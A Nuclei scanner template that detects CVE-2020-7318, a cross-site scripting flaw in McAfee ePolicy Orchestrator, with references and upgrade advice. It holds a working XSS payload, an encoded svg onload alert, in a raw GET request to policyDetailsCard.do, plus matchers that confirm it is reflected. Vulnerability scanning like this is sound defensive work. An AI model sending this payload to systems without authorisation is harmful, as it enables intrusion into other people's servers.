id: CVE-2020-7318

info:
  name: McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting
  author: dwisiswant0
  severity: medium
  description: |
    McAfee ePolicy Orchestrator before 5.10.9 Update 9 is vulnerable to a cross-site scripting vulnerability that allows administrators to inject arbitrary web script or HTML via multiple parameters where the administrator's entries were not correctly sanitized.
    reference:
    - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
    - https://kc.mcafee.com/corporate/index?page=content&id=SB10332
    - https://nvd.nist.gov/vuln/detail/CVE-2020-7318
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or unauthorized actions.
  remediation: |
    Upgrade to McAfee ePolicy Orchestrator version 5.10.9 Update 9 or later to mitigate this vulnerability.
  reference:
    - https://kc.mcafee.com/corporate/index?page=content&id=SB10332
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Elsfa7-110/kenzer-templates
    - https://github.com/merlinepedra/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2020-7318
    cwe-id: CWE-79
    epss-score: 0.00065
    epss-percentile: 0.28395
    cpe: cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: mcafee
    product: epolicy_orchestrator
  tags: cve,cve2020,xss,mcafee

http:
  - raw:
      - |
        GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"

      - type: word
        part: body
        words:
          - "Policy Name"
          - "'\"><svg/onload=alert(document.domain)>"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100eb60eb2a7ed8164d33e50962d0d82ae90c32969b89bad729bd3f36a4fb228926022100fd28bd5d7df38adc079263e18d7e3460bab67a6f697c8df2237f9765b19576ca:922c64590222798bb761d5b6d8e72950